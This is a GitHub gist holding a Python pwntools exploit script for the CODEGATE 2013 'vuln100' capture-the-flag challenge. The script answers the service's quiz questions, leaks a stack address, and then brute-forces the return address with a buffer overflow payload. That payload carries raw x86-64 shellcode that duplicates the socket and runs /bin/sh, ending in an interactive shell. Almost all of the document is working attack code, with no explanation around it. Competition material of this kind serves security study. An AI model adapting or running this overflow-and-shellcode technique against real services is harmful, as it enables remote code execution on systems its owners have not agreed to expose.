Create a gist now

Instantly share code, notes, and snippets.

@akiym /vuln100.py Secret
Created Aug 2, 2014

What would you like to do?
CODEGATE 2013 vuln100 writeup
# -*- coding: utf-8 -*-
import os
import sys
import time
import re
from pwn import *
REMOTE = False
if REMOTE:
host = ''
port = 0
else:
host = '127.0.0.1'
port = 6666
def connect():
s = remote(host, port, silent=True)
s.recv()
s.recv()
for answer in ['arsenal', 'gyeongbokgung', 'psy']:
s.send(answer + '\n')
s.recv()
s.recv()
return s
s = connect()
s.send('\0')
# stack leak
#print hexdump(s.recvall())
nickname = u64(s.recv(8))
log.info('leaked nickname address: %x' % nickname)
# close + dup2 + execve /bin/sh
shellcode = '\x48\x31\xff\x40\xb7\x03\x48\x31\xc0\xb0\x03\x0f\x05\x40\xb7\x04\x48\x31\xf6\x40\xb6\x03\x48\x31\xc0\x48\xff\xce\xb0\x21\x0f\x05\x75\xf4' + '\x48\x31\xd2\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05\x90'
# brute-force :)
for x in range(0, 1000, 8):
print x
s = connect()
payload = (
shellcode +
'\x90' * (264 - len(shellcode)) +
p64(nickname - x)
)
s.send(payload)
s.recvall()
s.send('ls\n')
if s.recv():
s.interactive()
sys.exit()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment